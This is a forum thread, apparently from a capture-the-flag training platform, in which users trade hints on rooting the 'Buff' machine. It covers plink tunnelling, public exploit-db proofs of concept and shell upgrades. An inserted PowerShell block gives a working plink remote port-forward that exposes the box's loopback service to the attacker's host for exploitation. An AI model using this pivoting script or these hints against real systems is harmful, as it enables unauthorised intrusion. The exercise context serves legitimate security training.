Official Buff Discussion

Got the p**** connection through finally after talking to some old ones! But the flow is not working properly; they refuse the connection error.

@juL9M4hnAa5T said:

Thanks for the input, I am looking for the default location but am coming up dry. I’ll spin the app up on a Virtual Machine to investigate further.

Update: According to the installer it should be in Apa\Ll\Pr******\C******\ but the folder Pr***** does not exist.

You are looking for where it is running, not the file on disk.

I am stuck at the rooting; the only obvious exploit for me was the pl*****.x to attempt a Po*** For***.
Everything went fine: "Last login: Thu Aug 6 19:50:26 2020 from 10.10.10.198"
When trying to use winexe it asks me for a password (I found nothing in the registry; there is no default password).
Getting this error when typing any password or leaving it blank:
(ERROR: Failed to open connection - NT_STATUS_OBJECT_NAME_NOT_FOUND)

Am I in a rabbit hole or something? Any help will be appreciated.
Thanks in advance.

@ElleuchX1 said:

Am I in a rabbit hole or something? Any help will be appreciated.

I think you are in a rabbit hole. I can't guess what pl*****.****x**** is though.

If you are trying Po*** For*** and you are getting this "Last login: Thu Aug 6 19:50:26 2020 from 10.10.10.198" or you need creds from the remote machine, something is very wrong.

Oh my Lord! Finally rooted. I'm fairly new, never done this kind of privesc; I didn't know it was possible. Thanks to all here for the gentle nudges.
If you need some tips, you can DM me.

@TazWake said:

@ElleuchX1 said:

Am I in a rabbit hole or something? Any help will be appreciated.

I think you are in a rabbit hole. I can't guess what pl*****.****x**** is though.

If you are trying Po*** For*** and you are getting this "Last login: Thu Aug 6 19:50:26 2020 from 10.10.10.198" or you need creds from the remote machine, something is very wrong.
"plink"
Well... I found something interesting and a ready-to-use exploit.
Should've focused more on enum from the start.

C:\Windows\system32>whoami
whoami
buff\administrator

Hello everyone, having some issues with plink: cannot establish a connection because my password is incorrect?? However, I don't know which password I should put, though :neutral:
Maybe someone could DM me so that I can ask questions / be more specific about my issue here.

@rastafrange said:

Hello everyone, having some issues with plink: cannot establish a connection because my password is incorrect?? However, I don't know which password I should put, though :neutral:
Maybe someone could DM me so that I can ask questions / be more specific about my issue here.

It's the password for your account; think about where it's connecting.
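One way to set up the tunnel the reply above is hinting at, as an added example that is not from the thread or from the box's author: a plink.exe remote port forward run on the Windows box, so a service bound only to the box's loopback becomes reachable on the attacker's own machine. Everything concrete here is an assumption: the attacker VPN address, the SSH user name, the plink path, the local port number, the environment variable holding the password, and that an SSH server on the attacker's host accepts password logins.

```powershell
# Added example (not from the thread). Assumptions, all placeholders:
#   $attacker  - the attacking machine's VPN address (the SSH server plink connects TO)
#   $user      - an account on the ATTACKER's host; -pw is that account's password,
#                not anything recovered from the box
#   $plink     - where plink.exe was dropped on the box
#   $localPort - the port of the service that only listens on the box's 127.0.0.1
$attacker  = "10.10.14.5"
$user      = "kali"
$plink     = "C:\Users\Public\plink.exe"
$localPort = 8888

# Check the service really is bound to loopback before tunnelling (-ano also shows the owning PID).
netstat -ano | Select-String ":$localPort\s"

# -R <listen-port>:<host>:<port> makes the attacker's sshd listen on 127.0.0.1:$localPort and
# relay it to 127.0.0.1:$localPort on the box.  -N keeps the session open without a remote shell.
# Piping "y" answers the one-time host-key prompt; the password comes from an env var set beforehand.
echo y | & $plink -ssh -l $user -pw $env:ATTACKER_PW -R "${localPort}:127.0.0.1:${localPort}" -N $attacker
```

After the session is up, the exploit for the loopback-only service is run on the attacker's machine against 127.0.0.1:8888, exactly as if it were local. If the attacker's sshd has password authentication disabled, plink reports an "incorrect password" style failure regardless of what is typed, which is worth ruling out before assuming the credentials are wrong.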

I think I know how to achieve root, but I would like to know if someone was able to spawn a working msf meterpreter. My attempts are not able to exec anything.

@SpaceMoehre said:

I think I know how to achieve root, but I would like to know if someone was able to spawn a working msf meterpreter. My attempts are not able to exec anything.

You don’t need MSF for this.

@TazWake said:

You don’t need MSF for this.

I know, but I want to. Getting deeper into msf might be helpful at some time, so I like to try it on easy boxes. But the usual shell_to_meterpreter does not work.

@SpaceMoehre said:

I know, but I want to. Getting deeper into msf might be helpful at some time, so I like to try it on easy boxes. But the usual shell_to_meterpreter does not work.

OK - that makes sense, but it means you will probably have to experiment with this, as most people won't have gone for MSF.

It might be possible to change the privesc payload to call a meterpreter session and catch it with MSF.

OK, so by now I think that in order to get root I need to exploit the vulnerability in CM_.exe, and I've found its location on the machine. The problem is that when I run it, I can't find it working on the expected port or any port after typing netstat -ano. However, I sometimes find that the expected port is being used by a process that immediately disappears afterwards. Can anyone help explain what's going on? Thanks

The box’s name and picture are a hint for root if you’re stuck

I am trying to turn the fake shell into a real shell. I am reading the exploit from the db. Am I supposed to do the exploit manually through Burp Suite to get a browser shell? I do not understand where to inject the malicious stuff; could someone give me a nudge on this? Can a real browser shell do file transfers, unlike the fake shell?

@squirrelpizza said:

I am trying to turn the fake shell into a real shell. I am reading the exploit from the db.

If you’ve used the one I used, the explanation gives you an incorrect path to use. You need to read the source code to see how it is structured.

Am I supposed to do the exploit manually through Burp Suite to get a browser shell?

No, unless you want to.

I do not understand where to inject the malicious stuff; could someone give me a nudge on this?

Read around the sixth line of the functional python code.

Can a real browser shell do file transfers, unlike the fake shell?

I don’t know what a real browser shell is, but the Remote Command Execution you get using this exploit allows you to upload using OS-based tools.

I am trying to privesc, but neither of the possible PoCs is working. Any hints?

@adidibra said:

I am trying to privesc, but neither of the possible PoCs is working. Any hints?

How convinced are you that there are only two possible PoCs? At a guess, if the two you've tried aren't working, you need to try something else.

@TazWake said:

@adidibra said:

I am trying to privesc, but neither of the possible PoCs is working. Any hints?

How convinced are you that there are only two possible PoCs? At a guess, if the two you've tried aren't working, you need to try something else.

I did not mention the number of PoCs. I have tested all of them found in the public db. I do not think there is another way to privesc.

@adidibra said:

I did not mention the number of PoCs. I have tested all of them found in the public db. I do not think there is another way to privesc.

Sorry, when you said “neither” I read that meaning two.

There is a public PoC which allows privesc.